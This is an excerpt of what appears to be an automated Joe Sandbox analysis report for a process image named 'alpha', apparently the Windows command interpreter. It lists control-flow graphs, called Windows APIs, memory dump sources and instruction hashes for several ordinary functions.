1053->1059 1060 7ff6a0e8c657-7ff6a0e8c65b 1053->1060 1065 7ff6a0e7c780-7ff6a0e7c784 1056->1065 1077 7ff6a0e7c84d-7ff6a0e7c855 call 7ff6a0e7cad4 1057->1077 1078 7ff6a0e7c856-7ff6a0e7c86c 1057->1078 1058->1047 1061 7ff6a0e7c817-7ff6a0e7c81b 1059->1061 1062 7ff6a0e7c9e2-7ff6a0e7c9e7 1059->1062 1060->1059 1067 7ff6a0e7ca1b-7ff6a0e7ca1f 1061->1067 1068 7ff6a0e7c821 1061->1068 1062->1061 1069 7ff6a0e7c9ed-7ff6a0e7c9f7 call 7ff6a0e8291c 1062->1069 1070 7ff6a0e7c83d 1065->1070 1071 7ff6a0e7c78a-7ff6a0e7c7a4 wcschr 1065->1071 1067->1068 1079 7ff6a0e7ca25-7ff6a0e8c6b3 call 7ff6a0e73278 1067->1079 1073 7ff6a0e7c824-7ff6a0e7c82d 1068->1073 1086 7ff6a0e7c9fd-7ff6a0e7ca00 1069->1086 1087 7ff6a0e8c684-7ff6a0e8c698 call 7ff6a0e73278 1069->1087 1070->1057 1075 7ff6a0e7c7aa-7ff6a0e7c7ad 1071->1075 1076 7ff6a0e7c8de-7ff6a0e7c8f7 1071->1076 1073->1073 1080 7ff6a0e7c82f-7ff6a0e7c837 1073->1080 1082 7ff6a0e7c7b0-7ff6a0e7c7b8 1075->1082 1083 7ff6a0e7c900-7ff6a0e7c908 1076->1083 1077->1078 1078->1037 1078->1041 1079->1004 1080->1065 1080->1070 1082->1082 1088 7ff6a0e7c7ba-7ff6a0e7c7c7 1082->1088 1083->1083 1089 7ff6a0e7c90a-7ff6a0e7c915 1083->1089 1086->1061 1094 7ff6a0e7ca06-7ff6a0e7ca10 call 7ff6a0e789c0 1086->1094 1087->1004 1088->1053 1095 7ff6a0e7c7cd-7ff6a0e7c7db 1088->1095 1096 7ff6a0e7c93a-7ff6a0e7c944 1089->1096 1097 7ff6a0e7c917 1089->1097 1094->1061 1111 7ff6a0e7ca16-7ff6a0e8c67f GetLastError call 7ff6a0e73278 1094->1111 1100 7ff6a0e7c7e0-7ff6a0e7c7e7 1095->1100 1103 7ff6a0e7ca2a-7ff6a0e7ca2f call 7ff6a0e89158 1096->1103 1104 7ff6a0e7c94a 1096->1104 1101 7ff6a0e7c920-7ff6a0e7c928 1097->1101 1106 7ff6a0e7c7e9-7ff6a0e7c7f1 1100->1106 1107 7ff6a0e7c800-7ff6a0e7c803 1100->1107 1108 7ff6a0e7c92a-7ff6a0e7c92f 1101->1108 1109 7ff6a0e7c932-7ff6a0e7c938 1101->1109 1103->1013 1104->1007 1106->1107 1112 7ff6a0e7c7f3-7ff6a0e7c7fe 1106->1112 1107->1042 1113 7ff6a0e7c809 1107->1113 1108->1109 1109->1096 1109->1101 1111->1004 1112->1100 1112->1107 1113->1059
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleTitlewcschr
                                                                                          • String ID: /$:
                                                                                          • API String ID: 2364928044-4222935259
                                                                                          • Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                          • Instruction ID: e06543d5bb5c77c09212426f39243cc197a4159596bddd93863e3cde5feb2424
                                                                                          • Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                          • Instruction Fuzzy Hash: 91C1D172E0A643A1FA689B25D4143B962A5FF85B90F448139DA1EC73D2EF3CE845F700
                                                                                          Function 00007FF6A0E88D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1171 7ff6a0e88d80-7ff6a0e88da2 1172 7ff6a0e88da4-7ff6a0e88daf 1171->1172 1173 7ff6a0e88db1-7ff6a0e88db4 1172->1173 1174 7ff6a0e88dcc 1172->1174 1175 7ff6a0e88dbf-7ff6a0e88dca Sleep 1173->1175 1176 7ff6a0e88db6-7ff6a0e88dbd 1173->1176 1177 7ff6a0e88dd1-7ff6a0e88dd9 1174->1177 1175->1172 1176->1177 1178 7ff6a0e88de7-7ff6a0e88def 1177->1178 1179 7ff6a0e88ddb-7ff6a0e88de5 _amsg_exit 1177->1179 1181 7ff6a0e88df1-7ff6a0e88e0a 1178->1181 1182 7ff6a0e88e46 1178->1182 1180 7ff6a0e88e4c-7ff6a0e88e54 1179->1180 1183 7ff6a0e88e73-7ff6a0e88e75 1180->1183 1184 7ff6a0e88e56-7ff6a0e88e69 _initterm 1180->1184 1185 7ff6a0e88e0e-7ff6a0e88e11 1181->1185 1182->1180 1186 7ff6a0e88e80-7ff6a0e88e88 1183->1186 1187 7ff6a0e88e77-7ff6a0e88e79 1183->1187 1184->1183 1188 7ff6a0e88e13-7ff6a0e88e15 1185->1188 1189 7ff6a0e88e38-7ff6a0e88e3a 1185->1189 1192 7ff6a0e88eb4-7ff6a0e88ec8 call 7ff6a0e837d8 1186->1192 1193 7ff6a0e88e8a-7ff6a0e88e98 call 7ff6a0e894f0 1186->1193 1187->1186 1190 7ff6a0e88e17-7ff6a0e88e1b 1188->1190 1191 7ff6a0e88e3c-7ff6a0e88e41 1188->1191 1189->1180 1189->1191 1194 7ff6a0e88e2d-7ff6a0e88e36 1190->1194 1195 7ff6a0e88e1d-7ff6a0e88e29 1190->1195 1197 7ff6a0e88f28-7ff6a0e88f3d 1191->1197 1199 7ff6a0e88ecd-7ff6a0e88eda 1192->1199 1193->1192 1201 7ff6a0e88e9a-7ff6a0e88eaa 1193->1201 1194->1185 1195->1194 1203 7ff6a0e88ee4-7ff6a0e88eeb 1199->1203 1204 7ff6a0e88edc-7ff6a0e88ede exit 1199->1204 1201->1192 1205 7ff6a0e88ef9 1203->1205 1206 7ff6a0e88eed-7ff6a0e88ef3 _cexit 1203->1206 1204->1203 1205->1197 1206->1205
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                          • String ID:
                                                                                          • API String ID: 4291973834-0
                                                                                          • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                          • Instruction ID: 7e78bba95abaca0db11812cda2f2204c227f555a0537cf74ebf385dc65f9b8f2
                                                                                          • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                          • Instruction Fuzzy Hash: 2841D831E0E687A6F7549B10EA4027562B1BF58346F644436E95EC77A0DF7CE848E740
                                                                                          Function 00007FF6A0E85CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1826527819-0
                                                                                          • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                          • Instruction ID: 69c79ed524f9bf397835da6ba45d2db6a92f5ad21214e85c9dd1ea16f9ba29c4
                                                                                          • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                          • Instruction Fuzzy Hash: 8E016D3190A683AAE6005B24A4441B9BBB1FF8E752F545134E54F823A6DF3C94489700
                                                                                          Function 00007FF6A0E83060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E81EA0: wcschr.MSVCRT(?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6A0EA0D54), ref: 00007FF6A0E81EB3
                                                                                          • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6A0E792AC), ref: 00007FF6A0E830CA
                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF6A0E830DD
                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E830F6
                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF6A0E83106
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$FullNamePathwcschr
                                                                                          • String ID:
                                                                                          • API String ID: 1464828906-0
                                                                                          • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                          • Instruction ID: 140ac910e9a6dbf823169bb0a3f970008de1033b6731bafc0565a9932178de45
                                                                                          • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                          • Instruction Fuzzy Hash: 80311332E0A613A6E7649F25A41417EB6A0FB49B94F548235DA5EC33D0DE7DE889A300
                                                                                          Function 00007FF6A0E7CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                          • API String ID: 2221118986-3416068913
                                                                                          • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                          • Instruction ID: 2b5cc85fcd3459605485be03ade3b720bdfcbd23ed7fc71a2e120c4f08da3648
                                                                                          • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                          • Instruction Fuzzy Hash: 0311E931B0A74791EB54CB65E1442B912A0BF89BE4F184335DE6ECB3D6DE3CD480A300
                                                                                          Function 00007FF6A0E7BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcschr
                                                                                          • String ID: 2$COMSPEC
                                                                                          • API String ID: 1764819092-1738800741
                                                                                          • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                          • Instruction ID: 7ed1a9f6bfa0e649fccef473a754143f2ea7bf535b9cc905f3fbb0799120d66a
                                                                                          • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                          • Instruction Fuzzy Hash: 8D516A32F0A64BA5FB789B25A8413B92295FF85B84F084036DA4DC67D7DF2CE844A741
                                                                                          Function 00007FF6A0E82EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 4254246844-0
                                                                                          • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                          • Instruction ID: 219f492d9f4d3db341910247ff5263064da078a242de427b056eb6b59c452005
                                                                                          • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                          • Instruction Fuzzy Hash: 9741CE32B0A783A6EE208B10E85437967A0FF99B94F548534DA4EC77D1EF3CE449A740
                                                                                          Function 00007FF6A0E8498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                          • String ID:
                                                                                          • API String ID: 2643372051-0
                                                                                          • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                          • Instruction ID: cd9eae14e4b87f3078b27132b39d6aef660c09a144b836c64922bd03a0988769
                                                                                          • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                          • Instruction Fuzzy Hash: AFF0F9B2A1BB83A1EB109B75F404075AAE1FF8E7A1B55D270D52E833D0DE3C94449200
                                                                                          Function 00007FF6A0E85A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                          • String ID:
                                                                                          • API String ID: 1591002910-0
                                                                                          • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                          • Instruction ID: 789c18de12357a51703056f8eb462a67878a1af29206af5288450d46688aac36
                                                                                          • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                          • Instruction Fuzzy Hash: 59F07A34A0B783EBE6148B20E865078BBB0FB8E722F558174D90E87331DF7CA4059B00
                                                                                          Function 00007FF6A0E8291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: DriveType
                                                                                          • String ID: :
                                                                                          • API String ID: 338552980-336475711
                                                                                          • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                          • Instruction ID: 10c3e276709585b532891a5257c16b276d064a047a1e428d704e57ce42a55034
                                                                                          • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                          • Instruction Fuzzy Hash: 23E06D7661964186E7209B60E4910AAB7B1FB8D349F941525EA8DC3724DF3CD249CB08
                                                                                          Function 00007FF6A0E85AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • GetConsoleTitleW.KERNELBASE ref: 00007FF6A0E85B52
                                                                                            • Part of subcall function 00007FF6A0E84224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E84297
                                                                                            • Part of subcall function 00007FF6A0E84224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E842D7
                                                                                            • Part of subcall function 00007FF6A0E84224: memset.MSVCRT ref: 00007FF6A0E842FD
                                                                                            • Part of subcall function 00007FF6A0E84224: memset.MSVCRT ref: 00007FF6A0E84368
                                                                                            • Part of subcall function 00007FF6A0E84224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E84380
                                                                                            • Part of subcall function 00007FF6A0E84224: wcsrchr.MSVCRT ref: 00007FF6A0E843E6
                                                                                            • Part of subcall function 00007FF6A0E84224: lstrcmpW.KERNELBASE ref: 00007FF6A0E84401
                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6A0E85BC7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                          • String ID:
                                                                                          • API String ID: 497088868-0
                                                                                          • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                          • Instruction ID: a8c44aec8ea05b04e96e2024b8d3491570abd9875239abdf5d767c39466e4258
                                                                                          • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                          • Instruction Fuzzy Hash: D531E631F0E78366FA24EB21A4901BDA295FF89BC0F545435E94EC7B96DE3CE506A700
                                                                                          Function 00007FF6A0E89A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 1412018758-0
                                                                                          • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                          • Instruction ID: 09860122d362fea8b796f8be254fdb9b3d35f5cb3d2fe6d8a396ba1c9d330b46
                                                                                          • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                          • Instruction Fuzzy Hash: 4DE01261F5B707B6FE182B62684117812547F5D741F5C1470DD1D85382FE2CA4A9A310
